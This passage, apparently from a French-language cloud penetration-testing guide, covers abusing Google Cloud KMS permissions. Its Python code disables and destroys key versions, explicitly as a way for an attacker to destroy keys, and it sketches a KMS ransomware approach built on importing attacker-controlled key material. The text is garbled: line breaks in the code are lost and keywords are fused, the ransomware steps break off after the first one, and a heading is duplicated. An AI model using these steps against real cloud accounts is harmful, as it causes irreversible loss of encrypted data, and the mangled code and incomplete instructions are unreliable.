Un attaquant avec cette autorisation pourrait détruire une version de KMS. Pour ce faire, vous devez d'abord désactiver la clé, puis la détruire :
# pip install google-cloud-kmsfrom google.cloud import kmsdefdisable_key_version(project_id,location_id,key_ring_id,key_id,key_version):"""Disables a key version in Cloud KMS."""# Create the client.client = kms.KeyManagementServiceClient()# Build the key version name.key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)# Call the API to disable the key version.client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})
defdestroy_key_version(project_id,location_id,key_ring_id,key_id,key_version):"""Destroys a key version in Cloud KMS."""# Create the client.client = kms.KeyManagementServiceClient()# Build the key version name.key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)# Call the API to destroy the key version.client.destroy_crypto_key_version(request={'name': key_version_name})# Example usageproject_id ='your-project-id'location_id ='your-location'key_ring_id ='your-key-ring'key_id ='your-key-id'key_version ='1'# Version number to disable and destroy# Disable the key versiondisable_key_version(project_id, location_id, key_ring_id, key_id, key_version)# Destroy the key versiondestroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
Rançongiciel KMS
Sur AWS, il est possible de voler complètement une clé KMS en modifiant la politique de ressources KMS et en ne permettant qu'au compte des attaquants d'utiliser la clé. Comme ces politiques de ressources n'existent pas dans GCP, cela n'est pas possible.
Cependant, il existe une autre façon d'effectuer un rançongiciel KMS global, qui impliquerait les étapes suivantes :
Créer une nouvelle version de la clé avec un matériel de clé importé par l'attaquant
from google.cloud import kmsimport base64defencrypt_symmetric(project_id,location_id,key_ring_id,key_id,plaintext):"""Encrypts data using a symmetric key from Cloud KMS."""# Create the client.client = kms.KeyManagementServiceClient()# Build the key name.key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)# Convert the plaintext to bytes.plaintext_bytes = plaintext.encode('utf-8')# Call the API.encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})ciphertext = encrypt_response.ciphertext# Optional: Encode the ciphertext to base64 for easier handling.return base64.b64encode(ciphertext)# Example usageproject_id ='your-project-id'location_id ='your-location'key_ring_id ='your-key-ring'key_id ='your-key-id'plaintext ='your-data-to-encrypt'ciphertext =encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)print('Ciphertext:', ciphertext)
cloudkms.cryptoKeyVersions.useToSign
import hashlibfrom google.cloud import kmsdefsign_asymmetric(project_id,location_id,key_ring_id,key_id,key_version,message):"""Sign a message using an asymmetric key version from Cloud KMS."""# Create the client.client = kms.KeyManagementServiceClient()# Build the key version name.key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)# Convert the message to bytes and calculate the digest.message_bytes = message.encode('utf-8')digest ={'sha256': hashlib.sha256(message_bytes).digest()}# Call the API to sign the digest.sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)return sign_response.signature# Example usage for signingproject_id ='your-project-id'location_id ='your-location'key_ring_id ='your-key-ring'key_id ='your-key-id'key_version ='1'message ='your-message'signature =sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)print('Signature:', signature)
cloudkms.cryptoKeyVersions.useToVerify
cloudkms.cryptoKeyVersions.useToVerify
from google.cloud import kmsimport hashlibdefverify_asymmetric_signature(project_id,location_id,key_ring_id,key_id,key_version,message,signature):"""Verify a signature using an asymmetric key version from Cloud KMS."""# Create the client.client = kms.KeyManagementServiceClient()# Build the key version name.key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)# Convert the message to bytes and calculate the digest.message_bytes = message.encode('utf-8')digest ={'sha256': hashlib.sha256(message_bytes).digest()}# Build the verify request and call the API.verify_response = client.asymmetric_verify(name=key_version_name, digest=digest, signature=signature)return verify_response.success# Example usage for verificationverified =verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)print('Verified:', verified)